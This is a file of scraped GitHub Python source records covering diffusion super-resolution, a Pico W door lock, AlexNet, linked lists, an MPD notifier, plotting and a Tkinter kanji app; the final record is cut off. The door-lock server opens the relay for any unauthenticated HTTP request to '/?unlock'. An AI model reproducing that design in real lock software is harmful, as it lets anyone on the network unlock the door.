+{"seq_id":"69962799761","text":"import torch\nimport torch.nn as nn\nfrom unet import UNetModel\nfrom autoencoder import Autoencoder, Encoder, Decoder\nfrom vector_quantize_pytorch import FSQ\nfrom ddim import DDIMSampler\nfrom latent_diffusion import LatentDiffusion\nfrom clip_embedder import CLIPTextEmbedder\nimport torch.nn.functional as F\nfrom util import save_images, load_img\n\n\nclass SRQuantization(nn.Module):\n def __init__(self, ddim_steps: int = 50):\n super().__init__()\n self.unet = UNetModel(in_channels=4,\n out_channels=4,\n channels=320,\n attention_levels=[0, 1, 2],\n n_res_blocks=2,\n channel_multipliers=[1, 2, 4, 4],\n n_heads=8,\n tf_layers=1,\n d_cond=768)\n self.levels_before = [8, 6, 5] # this is for 3-dimension image, if 4-diemsion, set to [8, 5, 5, 5]\n\n self.quantizer_before = FSQ(self.levels_before)\n self.encoder = Encoder(z_channels=4,\n in_channels=3,\n channels=128,\n channel_multipliers=[1, 2, 4, 4],\n n_resnet_blocks=2)\n\n self.levels_after = [8, 5, 5, 5] # this is for 4-dimension image, if 3-diemsion, set to [8, 6, 5]\n self.quantizer_after = FSQ(self.levels_after)\n self.decoder = Decoder(out_channels=3,\n z_channels=4,\n channels=128,\n channel_multipliers=[1, 2, 4, 4],\n n_resnet_blocks=2)\n\n self.autoencoder = Autoencoder(emb_channels=4,\n encoder=self.encoder,\n decoder=self.decoder,\n z_channels=4)\n self.clip_text_embedder = CLIPTextEmbedder()\n\n self.latent_diffusion = LatentDiffusion(unet_model=self.unet,\n autoencoder=self.autoencoder,\n clip_embedder=self.clip_text_embedder,\n linear_start=0.00085,\n linear_end=0.0120,\n n_steps=1000,\n latent_scaling_factor=0.18215)\n self.sampler = DDIMSampler(self.latent_diffusion, n_steps=ddim_steps)\n self.device = 'cuda:0' if torch.cuda.is_available() else 'cpu'\n self.ddim_steps = ddim_steps\n\n def forward(self, lr, uncond_scale: float = 1.0, strength: float = 0.9999):\n lr_up = F.interpolate(lr, mode='bicubic', scale_factor=4)\n b, c, h, w = lr_up.shape\n assert (h, w) == (512, 512), f'h and w must equal to 512, but got h={h}, w={w}'\n prompt = ''\n # Make a batch of prompts\n prompts = b * [prompt]\n\n # Load image\n orig_image = lr_up.to(self.device)\n # # transform lr_up to 3D data to satisfy the input size of quantizer\n # orig_q = orig_image.permute(0, 2, 3, 1).contiguous().view(b, -1, c) # (b, h, w, c)->(b, h*w, c)\n # # Finite-Scalar Quatization\n # orig_image_quantized, _ = self.quantizer_before(orig_q)\n # # transform orig_image_quantized back to orig_image's size\n # orig_image_quantized = orig_image_quantized.view(b, h, w, c).permute(0, 3, 1, 2)\n\n # Encode the image in the latent space and make `batch_size` copies of it\n orig = self.latent_diffusion.autoencoder_encode(orig_image).repeat(b, 1, 1, 1)\n\n # Get the number of steps to diffuse the original\n assert 0. <= strength <= 1., 'can only work with strength in [0.0, 1.0]'\n t_index = int(strength * self.ddim_steps)\n # # AMP auto casting\n # with torch.cuda.amp.autocast():\n # In unconditional scaling is not $1$ get the embeddings for empty prompts (no conditioning).\n if uncond_scale != 1.0:\n un_cond = self.latent_diffusion.get_text_conditioning(b * [\"\"])\n else:\n un_cond = None\n # Get the prompt embeddings\n cond = self.latent_diffusion.get_text_conditioning(prompts)\n\n # Add noise to the original image\n x = self.sampler.q_sample(orig, t_index)\n # Reconstruct from the noisy image\n x = self.sampler.paint(x, cond, t_index,\n uncond_scale=uncond_scale,\n uncond_cond=un_cond)\n # Decode the image from the [autoencoder](../model/autoencoder.html)\n # # transform x to 3D data to satisfy the input size of quantizer\n # bx, cx, hx, wx = x.shape\n # x_q = x.permute(0, 2, 3, 1).contiguous().view(bx, -1, cx) # (bx, hx, wx, cx)->(bx, hx*wx, cx)\n # # Finite-Scalar Quatization\n # x_quantized, _ = self.quantizer_after(x_q)\n # # transform x_quantized back to x's size\n # x_quantized = x_quantized.view(bx, hx, wx, cx).permute(0, 3, 1, 2)\n hr = self.latent_diffusion.autoencoder_decode(x)\n return hr\n\n def load(self, unet_checkpoint_path: str, auto_encoder_checkpoint_path: str):\n self.unet.load_state_dict(torch.load(unet_checkpoint_path))\n # self.autoencoder.load_state_dict(torch.load(auto_encoder_checkpoint_path))\n\n self.unet.requires_grad_(False)\n # self.autoencoder.requires_grad_(False)\n self.clip_text_embedder.requires_grad_(False)\n\n# model = SRQuantization().to('cuda:0')\n# model.load(unet_checkpoint_path='E:/AI/checkpoints/stable-diffusion-v-1-4-original/sd-v1-4-unet.ckpt',\n# auto_encoder_checkpoint_path='E:/AI/checkpoints/stable-diffusion-v-1-4-original/sd-v1-4-auto-encoder.ckpt')\n# lr = load_img('D:/Materials/dataset/DIV2K 2018/DIV2K_valid_LR_unknown_X4_sub/0855_s018.png')\n# hr = model(lr)\n# save_images(hr, dest_path='outputs', prefix='sr_img_')\n# levels = [8,5,5,5] # see 4.1 and A.4.1 in the paper\n# quantizer = FSQ(levels)\n#\n#\n#\n# x = torch.randn(1, 1024, 4) # 4 since there are 4 levels\n# xhat, indices = quantizer(x)\n#\n# print(xhat.shape) # (1, 1024, 4) - (batch, seq, dim)\n# print(indices.shape) # (1, 1024) - (batch, seq)\n#\n# assert xhat.shape == x.shape\n# assert torch.all(xhat == quantizer.indices_to_codes(indices))\n","repo_name":"safeanimal/Deep-learning-exercises","sub_path":"personal implementation/StableDiffusion/sr_quantization.py","file_name":"sr_quantization.py","file_ext":"py","file_size_in_byte":6429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10443099890","text":"import config\nimport network\nimport socket\nfrom utime import sleep_ms, ticks_us, ticks_diff\nfrom uselect import select\nfrom machine import Pin\n\n \n#Set up pins\nRELAY_PIN=16\n\n#Pulse length in ms\nPULSE_LENGTH=500\n\n#States\nTARGET_LOCK_STATE_UNSECURED=0\nTARGET_LOCK_STATE_SECURED=1\n\nCURRENT_LOCK_STATE_UNSECURED = 0\nCURRENT_LOCK_STATE_SECURED = 1\nCURRENT_LOCK_STATE_JAMMED = 2\nCURRENT_LOCK_STATE_UNKNOWN = 3\n\n#Config\nREBOOT_AFTER_SECONDS=60*60*12 #12 hours\nREBOOT_AFTER_SECONDS_IF_NO_WIFI=120 #1 minute\n\n\n#Setup pins for relay and sensors\nrelay = Pin(RELAY_PIN, Pin.OUT)\nwifi = network.WLAN(network.STA_IF)\n\n#Global statuses\ntargetState=TARGET_LOCK_STATE_SECURED\ncurrentState=CURRENT_LOCK_STATE_SECURED\n\ndef connectWifi():\n global wlan\n\n wifi = network.WLAN(network.STA_IF)\n wifi.active(True)\n wifi.connect(config.ssid, config.password)\n\n max_wait = 10\n \n wifiStartTime = ticks_us()\n while wifi.status() != 3:\n wifiElapsedTimeS = round(ticks_diff(ticks_us(), wifiStartTime) / 1000000.0)\n print(\"Waiting for connection for: {} seconds\".format(wifiElapsedTimeS))\n \n if wifiElapsedTimeS >= REBOOT_AFTER_SECONDS_IF_NO_WIFI:\n print(\"Rebooting...\")\n sleep_ms(200)\n machine.reset()\n\n print('Wifi status: '+str(wifi.status()))\n sleep_ms(1000)\n\n print('connected')\n status = wifi.ifconfig()\n ipAddress=status[0]\n print( 'ip = ' + ipAddress )\n\nconnectWifi()\n\n#Set up socket and start listening on port 80\naddr = socket.getaddrinfo(wifi.ifconfig()[0], 80)[0][-1]\ns = socket.socket()\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ns.bind(addr)\ns.listen(1)\n\nprint('listening on', addr)\n\ndef unlockDoor():\n print('unlockDoor')\n setTargetState(TARGET_LOCK_STATE_UNSECURED)\n# setCurrentState(CURRENT_LOCK_STATE_UNSECURED)\n relay.value(1)\n sleep_ms(PULSE_LENGTH)\n relay.value(0)\n\n retval=getLockStates()\n\n setTargetState(TARGET_LOCK_STATE_SECURED)\n setCurrentState(CURRENT_LOCK_STATE_SECURED)\n\n return retval\n\ndef lockDoor(): \n print('lockDoor')\n setTargetState(TARGET_LOCK_STATE_SECURED)\n setCurrentState(CURRENT_LOCK_STATE_SECURED)\n return getLockStates()\n\ndef returnError(errcode):\n return '{\"success\": false, \"error\": \"'+errcode+'\"}'\n\ndef getLockStates():\n print('getLockStates')\n global targetState\n global currentState\n\n return '{\"success\": true, \"currentState\": '+str(currentState)+', \"targetState\": '+str(targetState)+'}'\n\ndef setTargetState(state):\n global targetState\n \n if(state==TARGET_LOCK_STATE_UNSECURED):\n targetState=TARGET_LOCK_STATE_UNSECURED\n else:\n targetState=TARGET_LOCK_STATE_SECURED\n \ndef setCurrentState(state):\n global currentState\n \n if(state==CURRENT_LOCK_STATE_UNSECURED):\n currentState=CURRENT_LOCK_STATE_UNSECURED\n else:\n currentState=CURRENT_LOCK_STATE_SECURED\n\n#Handle an incoming request\ndef handleRequest(conn, address):\n print('Got a connection from %s' % str(addr))\n request = conn.recv(1024)\n request = str(request)\n\n print(request)\n\n if request.find('/?unlock')==6:\n response=unlockDoor()\n elif request.find('/?lock')==6:\n response=lockDoor()\n elif request.find('/?getstatus')==6:\n response=getLockStates()\n else:\n response=returnError('UNKNOWN_COMMAND')\n\n print(response)\n\n conn.send('HTTP/1.0 200 OK\\r\\nContent-type: application/json\\r\\n\\r\\n')\n conn.send(response)\n conn.close()\n\n#Main Loop\nstartTime = ticks_us()\n\nwhile True:\n elapsedTimeS = round(ticks_diff(ticks_us(), startTime) / 1000000.0)\n print(\"Elapsed time: {} seconds\".format(elapsedTimeS))\n \n if elapsedTimeS >= REBOOT_AFTER_SECONDS:\n print(\"Rebooting...\")\n sleep_ms(200)\n machine.reset()\n\n #Check if wifi is connected, if not, reconnect\n if wifi.isconnected() == False:\n print('Connecting wifi...')\n connectWifi()\n\n print('Wifi connected.')\n #Handle incoming HTTP requests in a non-blocking way\n r, w, err = select((s,), (), (), 1)\n\n #Is there an incoming request? If so, handle the request\n if r:\n for readable in r:\n conn, addr = s.accept()\n try:\n handleRequest(conn, addr)\n except OSError as e:\n pass\n\n","repo_name":"mannbro/PiPicoWHomekitDoorLock","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"18085077847","text":"import torch.nn as nn\nimport torch\nimport torch.utils.model_zoo as model_zoo\nfrom torch.utils.data.dataset import Dataset\nimport datetime\nimport cv2\nimport sys\nimport os\nimport numpy as np\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import RandomSampler\nfrom torch.autograd import Variable\n\n__all__ = ['AlexNet', 'alexnet']\n\n\nmodel_urls = {\n 'alexnet': 'https://download.pytorch.org/models/alexnet-owt-4df8aa71.pth',\n}\n\nclass Rand_num(Dataset):\n def __init__(self):\n dirs = []\n self.label = []\n for i in range(3):\n dirs.append(sorted(os.listdir(\"data/largedataset/\"+str(i))))\n length = len(dirs[i])\n self.label.append(np.ones(length)*i)\n for i in range(3):\n for j in range(len(dirs[i])):\n dirs[i][j] = os.path.join(\"data/largedataset/\"+str(i),dirs[i][j])\n self.directories = np.concatenate((dirs[0],dirs[1],dirs[2]))\n self.label = np.concatenate((self.label[0], self.label[1], self.label[2]))\n assert len(self.directories) == len(self.label)\n\n def __getitem__(self, index):\n dirs = self.directories[index]\n data = []\n for element in sorted(os.listdir(dirs)):\n dirs_mod = os.path.join(dirs,element)\n img=cv2.imread(dirs_mod,1)\n img=cv2.resize(img,None,fx=227.0/480, fy=227.0/270, interpolation = cv2.INTER_CUBIC)\n data.append(np.swapaxes(np.swapaxes(img, 2, 1), 1, 0))\n return np.array(data), self.label[index]\n\n def __len__(self):\n return len(self.directories)\n\nclass AlexNet(nn.Module):\n\n def __init__(self, num_classes=1000):\n super(AlexNet, self).__init__()\n self.features = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=11, stride=4, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(64, 192, kernel_size=5, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(192, 384, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(256, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n )\n self.classifier = nn.Sequential(\n nn.Dropout(),\n nn.Linear(256 * 6 * 6, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(inplace=True),\n nn.Linear(4096, num_classes),\n )\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), 256 * 6 * 6)\n x = self.classifier(x)\n return x\n\n\ndef alexnet(pretrained=False, **kwargs):\n r\"\"\"AlexNet model architecture from the\n `\"One weird trick...\" `_ paper.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = AlexNet(**kwargs)\n if pretrained:\n model.load_state_dict(model_zoo.load_url(model_urls['alexnet']))\n return model\n\nif __name__ == '__main__':\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\n torch.backends.cudnn.benchmark = True\n net = alexnet(pretrained = True)\n net.cuda()\n dataset = Rand_num()\n sampler = RandomSampler(dataset)\n loader = DataLoader(dataset, batch_size = 1, sampler = sampler, shuffle = False, num_workers=2)\n\n for i, data in enumerate(loader, 0):\n print(i)\n video, labels = data\n# labels = torch.squeeze(Variable(labels.long().cuda()))\n video = torch.squeeze(Variable((video.float()/256).cuda()))\n net.train()\n outputs = net.forward(video)\n o = outputs.data.cpu().numpy()\n outdir = './data/largecnndata/'+str(i)+'.csv'\n np.savetxt(outdir, o, fmt='%g', delimiter=',', newline='\\n', header=str(labels.numpy()[0]), footer='', comments='')\n","repo_name":"lizeqian/cs534_project","sub_path":"alexnet.py","file_name":"alexnet.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"17004628491","text":"\"\"\" Interview Cake question No. 23 Does this Linked List have a loop?\"\"\"\n\n# A node class implementation\nclass LinkedListNode:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\"\"\" \n Peforms a check through the list with two pointers, one moves one node at a time, the other one two at a time,\n if they ever cross the same value, it means that the fast pointer 'catched up' to the slow one, meaning that the linked list \n loops\n\"\"\"\ndef hasLoop(linkedListNode):\n runnerFast = linkedListNode.next.next\n runnerSlow = linkedListNode.next\n\n runnerSlowGoes = False\n while(runnerFast.value != runnerSlow.value):\n # print(\"Slow at \",runnerSlow.value)\n # print(\"Fast at \",runnerFast.value)\n if(runnerFast.next == None):\n print(\"List is none looping\")\n break\n if(runnerSlowGoes):\n runnerSlow = runnerSlow.next\n runnerSlowGoes = False\n else:\n runnerSlowGoes = True\n runnerFast = runnerFast.next\n if(runnerFast.value == runnerSlow.value):\n print(\"List had a loop\")\n\n\n#Creating a linkedlist with a loop to the first node\ndef test1():\n list = LinkedListNode(1)\n list.next = LinkedListNode(2)\n list.next.next = LinkedListNode(3)\n list.next.next.next = list\n hasLoop(list)\n#Creating a linkedlist with no loop\ntest1()\ndef test2():\n list = LinkedListNode(1)\n list.next = LinkedListNode(2)\n list.next.next = LinkedListNode(3)\n hasLoop(list) \ntest2()\n\n#Creating a linkedlist with a loop to the second node\ndef test3():\n list = LinkedListNode(1)\n list.next = LinkedListNode(2)\n list.next.next = LinkedListNode(3)\n list.next.next.next = list.next\n hasLoop(list) \ntest3()\n\n#Creating a linkedlist with a loop to the final node\ndef test4():\n list = LinkedListNode(1)\n list.next = LinkedListNode(2)\n list.next.next = LinkedListNode(3)\n list.next.next.next = list.next.next\n hasLoop(list) \ntest4()","repo_name":"kevuno/MicrosoftInterviewPractice","sub_path":"CircularLinkedList/isLinkedListCircular.py","file_name":"isLinkedListCircular.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"39659628353","text":"import requests\r\nimport json\r\nimport csv\r\n\r\ndef fetch_json_data(api_url):\r\n try:\r\n response = requests.get(api_url)\r\n response.raise_for_status()\r\n json_data = response.json()\r\n return json_data\r\n except requests.exceptions.HTTPError as e:\r\n print(f\"Error fetching JSON data from API: {e}\")\r\n return None\r\n\r\ndef get_csv_header(json_data):\r\n if isinstance(json_data, list) and json_data:\r\n return list(json_data[0].keys())\r\n elif isinstance(json_data, dict):\r\n return list(json_data.keys())\r\n else:\r\n return []\r\n\r\ndef write_csv_file(json_data, csv_file_path):\r\n header = get_csv_header(json_data)\r\n\r\n with open(csv_file_path, 'w', newline='', encoding='utf-8') as csvfile:\r\n csv_writer = csv.DictWriter(csvfile, fieldnames=header)\r\n csv_writer.writeheader()\r\n\r\n if isinstance(json_data, list):\r\n for item in json_data:\r\n csv_writer.writerow(item)\r\n elif isinstance(json_data, dict):\r\n csv_writer.writerow(json_data)\r\n\r\ndef json_to_csv(api_url, csv_file_path):\r\n json_data = fetch_json_data(api_url)\r\n if json_data:\r\n write_csv_file(json_data, csv_file_path)\r\n\r\nif __name__ == '__main__':\r\n # Example usage\r\n api_url = \"https://api.example.com/data\"\r\n csv_file_path = \"output.csv\"\r\n\r\n json_to_csv(api_url, csv_file_path)\r\n","repo_name":"michaelwnau/striga","sub_path":"app/json_to_csv.py","file_name":"json_to_csv.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"26721446406","text":"import mutagen\nimport os\nimport io\nimport base64\nimport time\nfrom PIL import Image\n\nfrom mpd import MPDClient\n\n\nclass MPD:\n def __init__(self, host, port, music_dir):\n self.host = host\n self.port = port\n self.music_dir = music_dir\n\n self.mpd = MPDClient()\n self.mpd.connect(self.host, self.port)\n\n self.title = self.get_title()\n self.artist = self.get_artist()\n self.album = self.get_album()\n self.file = self.get_file()\n\n def get_state(self):\n return self.mpd.status()[\"state\"]\n\n def get_artist(self):\n return self.mpd.currentsong().get(\"artist\")\n\n def get_album(self):\n return self.mpd.currentsong().get(\"album\")\n\n def get_cover(self):\n file_path = os.path.expanduser(os.path.join(self.music_dir, self.file))\n mf = mutagen.File(file_path)\n pictureData = None\n out_path = \"/tmp/mpd-notify.png\"\n\n try:\n if isinstance(mf.tags, mutagen._vorbis.VComment) or isinstance(\n mf, mutagen.ogg.OggFileType\n ):\n artwork_bytes = base64.b64decode(mf[\"metadata_block_picture\"][0])\n picture = mutagen.flac.Picture(artwork_bytes)\n pictureData = io.BytesIO(picture.data)\n\n elif isinstance(mf.tags, mutagen.id3.ID3) or isinstance(\n mf, mutagen.id3.ID3FileType\n ):\n artwork_bytes = mf.tags[\"APIC:\"].data\n pictureData = io.BytesIO(artwork_bytes)\n\n img = Image.open(pictureData)\n img = img.resize((96, 96))\n img.save(out_path)\n return out_path\n except:\n return \"\"\n\n def get_file(self):\n return self.mpd.currentsong().get(\"file\")\n\n def get_fullfile(self):\n return os.path.join(self.music_dir, self.file)\n\n def get_title(self):\n return self.mpd.currentsong().get(\"title\")\n\n def update(self):\n self.title = self.get_title()\n self.album = self.get_album()\n self.artist = self.get_artist()\n self.file = self.get_file()\n self.cover = self.get_cover()\n\n def watch(self):\n old_file = self.file\n while True:\n # Wait until mpd status change\n self.mpd.idle()\n if self.get_state() == \"stop\":\n break\n\n self.update()\n\n # prevent multiple undesired notification\n if old_file != self.file:\n time.sleep(0.25)\n break\n\n\n\"\"\"\nmpd-notify - Notification wrapper for mpd\nCopyright (C) 2020 slapelachie\n\nThis program is free software; you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation; either version 2 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nFind the full license in the root of this project\n\"\"\"","repo_name":"slapelachie/mpd-notify","sub_path":"mpd_notify/mpd.py","file_name":"mpd.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"16218042813","text":"\nfrom Adafruit_IO import RequestError, Client, Feed #Se importa la libreria de Adafruit\nfrom pylab import *\n\nADAFRUIT_IO_USERNAME = \"SammusDeVennus\"\n\n\nADAFRUIT_IO_KEY = \"xxxxxxxxxxxxxxxxxx\"\n\n\n\naio = Client(ADAFRUIT_IO_USERNAME, ADAFRUIT_IO_KEY)\n\ntry:\n test1 = aio.feeds(\"senoidal\")\n test2 = aio.feeds(\"cosenoidal\")\nexcept RequestError: #En caso de no existir el Feed se crean, en este caso se crearon dos feeds\n test_feed1 =Feed(name=\"senoidal\")\n test_feed1 =aio.create_feed(test_feed1)\n \n test_feed2 =Feed(name=\"cosenoidal\")\n test_feed2 =aio.create_feed(test_feed2)\n\n\ngrados=1\n\nwhile grados<=360:\n m=sin(grados)\n n=cos(grados)\n aio.send_data(test1.key, m)\n aio.send_data(test2.key, n)\n grados=grados+0.25\n time.sleep(5)\n \n \n \n","repo_name":"SammusDe/Prueba_IOT","sub_path":"Programacion_Python/señales.py","file_name":"señales.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"74244748551","text":"from __future__ import print_function\nfrom os import listdir\nfrom os.path import isfile, join\nimport sys\n\nfrom PIL import Image\n\n\nif len(sys.argv) != 3:\n print('Please provide and as arguments..')\n sys.exit(1)\n\nraw_images_path = sys.argv[1]\ncropped_images_path = sys.argv[2]\n\nraw_images_paths = [f for f in listdir(raw_images_path) if isfile(join(raw_images_path, f))]\nfor image_path in raw_images_paths:\n print(image_path)\n with open(raw_images_path + image_path, 'r+b') as f:\n with Image.open(f) as image:\n image = image.resize((256, 256), Image.ANTIALIAS)\n image.save(cropped_images_path + image_path, image.format)\n #cover = resizeimage.resize_cover(image, [256, 256])\n #cover.save(cropped_images_path + image_path, image.format)\n","repo_name":"chandana44/sketch2cartoon","sub_path":"src/preprocess/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"22730470948","text":"import numpy as np\n\nfrom utils.transform_utils import invert_review_chance\n\n\ndef get_alpha():\n # Alpha for 1 and 2 standard-deviations\n alpha = [0.05, 0.32]\n return alpha\n\n\ndef get_alpha_index():\n # Arbitrarily chosen so that alpha = 0.32. cf. get_alpha()\n alpha_index_to_display = 1\n return alpha_index_to_display\n\n\ndef predict_with_mapie(model, X):\n alpha = get_alpha()\n alpha_index_to_display = get_alpha_index()\n\n try:\n ypred, ypis = model.predict(X, alpha=alpha)\n\n lower_bound = ypis[:, 0, alpha_index_to_display]\n upper_bound = ypis[:, 1, alpha_index_to_display]\n ystd = 0.5 * (upper_bound - lower_bound).ravel()\n\n except TypeError:\n try:\n ypred, ystd = model.predict(X, return_std=True)\n\n except TypeError:\n ypred = model.predict(X)\n ystd = 0\n\n return ypred, ystd\n\n\ndef get_prediction_bounds(ypred, ystd, required_to_be_positive=True):\n p_lower = ypred - ystd\n p_upper = ypred + ystd\n\n if required_to_be_positive:\n machine_epsilon = np.finfo(float).eps\n\n p_lower = max(machine_epsilon, p_lower)\n p_upper = max(machine_epsilon, p_upper)\n\n return p_lower, p_upper\n\n\ndef invert_prediction_bounds(X, p_lower, p_upper, inverse_func=None):\n if inverse_func is None:\n inverse_func = invert_review_chance\n\n inv_p_lower = inverse_func(X, p_lower)\n inv_p_upper = inverse_func(X, p_upper)\n\n p_lower = min(inv_p_lower, inv_p_upper)\n p_upper = max(inv_p_lower, inv_p_upper)\n\n return p_lower, p_upper\n","repo_name":"woctezuma/steam-reviews-to-sales","sub_path":"utils/mapie_utils.py","file_name":"mapie_utils.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"}
+{"seq_id":"29108296940","text":"import tkinter as tk\r\nfrom tkinter import messagebox\r\nfrom PIL import ImageTk, Image\r\nimport psycopg2\r\n\r\nWIDTH = 550\r\nHEIGHT = 350\r\n\r\nWIDTHAdd = 350\r\nHEIGHTAdd = 200\r\n\r\nclass MainWindow:\r\n\r\n def __init__(self, master):\r\n # Defining master configs\r\n self.master = master\r\n self.master.geometry(f\"{WIDTH}x{HEIGHT}\")\r\n self.master.maxsize(WIDTH, HEIGHT)\r\n self.master.iconbitmap(\"Images/icon.ico\")\r\n self.master.title(\"漢字復習\")\r\n self.master.config(bg=\"pink\")\r\n\r\n\r\n\r\n\r\n\r\n # Adding the canvas for the Title\r\n self.TitleCanvas = tk.Canvas(self.master, bg = \"pink\", highlightthickness=0)\r\n self.TitleCanvas.pack(expand = True)\r\n\r\n # Adding the canvas for the Image\r\n self.ImageCanvas = tk.Canvas(self.master, bg = \"pink\", highlightthickness=0)\r\n self.ImageCanvas.pack(expand = True)\r\n\r\n # Adding the canvas for the Buttons\r\n self.ButtonsCanvas = tk.Canvas(self.master, bg = \"pink\", highlightthickness=0)\r\n self.ButtonsCanvas.pack(expand = True, fill = \"both\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n # Adding the Title\r\n self.TitleLabel = tk.Label(self.TitleCanvas, text = \"Welcome to 漢字復習!\")\r\n self.TitleLabel.config(font = (\"Courier\", 20, \"bold\"), bg = \"pink\")\r\n self.TitleLabel.pack()\r\n\r\n\r\n # Adding the image to the master\r\n image = Image.open(\"Images/umaru.jpg\").resize((300,200), Image.ANTIALIAS)\r\n UmaruPath = ImageTk.PhotoImage(image)\r\n self.Umarulabel = tk.Label(self.ImageCanvas, image = UmaruPath)\r\n self.Umarulabel.image = UmaruPath\r\n self.Umarulabel.pack()\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n # Buttons ------------------------------------------------------------------------------------------------------------\r\n\r\n # Creating the Button that opens the Kanji List\r\n self.KanjiListPopButton = tk.Button(self.ButtonsCanvas, text = \"Show Kanji List\", command = lambda: self.OpenNewWindow(WindowOne))\r\n self.KanjiListPopButton.config(height = 2, width = 16 , bg = \"#F98FB4\")\r\n self.KanjiListPopButton.pack(side = \"right\", padx = 5)\r\n\r\n\r\n # Creating the Button that opens the Add to kanji List window\r\n self.AddKanjiButton = tk.Button(self.ButtonsCanvas, text = \"Add Kanji\", command = lambda: self.OpenNewWindow(WindowOne))\r\n self.AddKanjiButton.config(height = 2, width = 16, bg = \"#F98FB4\")\r\n self.AddKanjiButton.pack(side = \"right\", padx = 5)\r\n\r\n\r\n # Creating the Button that opens the Remove from kanji list window\r\n self.RemoveKanjiButton = tk.Button(self.ButtonsCanvas, text = \"Remove Kanji\", command = lambda: self.OpenNewWindow(WindowOne))\r\n self.RemoveKanjiButton.config(height = 2, width = 16, bg = \"#F98FB4\")\r\n self.RemoveKanjiButton.pack(side = \"right\", padx = 5)\r\n\r\n\r\n # Creating the Button that opens the Review window\r\n self.ReviewButton = tk.Button(self.ButtonsCanvas, text = \"Start Review\", command = lambda: self.OpenNewWindow(WindowOne))\r\n self.ReviewButton.config(height = 2, width = 16, bg = \"#F98FB4\")\r\n self.ReviewButton.pack(side = \"right\", padx = 5)\r\n\r\n\r\n\r\n\r\n # Functions ------------------------------------------------------------------------------------------------------------\r\n\r\n # Creating the function that pops new windows\r\n def OpenNewWindow(self, windowClass):\r\n self.NewWindow = tk.Toplevel(self.master)\r\n windowClass(self.NewWindow)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass WindowOne:\r\n\r\n def __init__(self, master):\r\n # Defining master configs\r\n self.master = master\r\n self.master.geometry(f\"{WIDTHAdd}x{HEIGHTAdd}\")\r\n self.master.maxsize(WIDTHAdd, HEIGHTAdd)\r\n self.master.iconbitmap(\"Images/icon.ico\")\r\n self.master.title(\"漢字復習 - Adding new Kanji!\")\r\n self.master.config(bg=\"pink\")\r\n\r\n\r\n\r\n\r\n\r\n # Canvas ------------------------------------------------------------------------------------------------------------\r\n\r\n # Adding the canvas for Keyword\r\n self.KeywordCanvas = tk.Canvas(self.master, bg = \"pink\", highlightthickness=0)\r\n self.KeywordCanvas.pack(expand = True)\r\n\r\n # Adding the canvas for Kanji\r\n self.KanjiCanvas = tk.Canvas(self.master, bg = \"pink\", highlightthickness=0)\r\n self.KanjiCanvas.pack(expand = True)\r\n\r\n # Adding the canvas for Buttons\r\n self.ButtonsCanvas = tk.Canvas(self.master, height = 20, bg = \"pink\", highlightthickness=0)\r\n self.ButtonsCanvas.pack(expand = True, fill = \"y\") \r\n\r\n\r\n\r\n\r\n\r\n # Labels ------------------------------------------------------------------------------------------------------------\r\n\r\n # Adding the Label for Keyword\r\n self.KeywordLabel = tk.Label(self.KeywordCanvas, text = \"Type here your Keyword:\", bg = \"pink\", width = 25)\r\n self.KeywordLabel.pack(side = \"left\")\r\n\r\n # Adding the Label for Kanji\r\n self.KanjiLabel = tk.Label(self.KanjiCanvas, text = \"Enter here the respective kanji:\", bg = \"pink\", width = 25)\r\n self.KanjiLabel.pack(side = \"left\")\r\n\r\n\r\n\r\n\r\n # Entries ------------------------------------------------------------------------------------------------------------\r\n\r\n # Defining textvariables dor entry\r\n self.Keywordcontent = tk.StringVar()\r\n 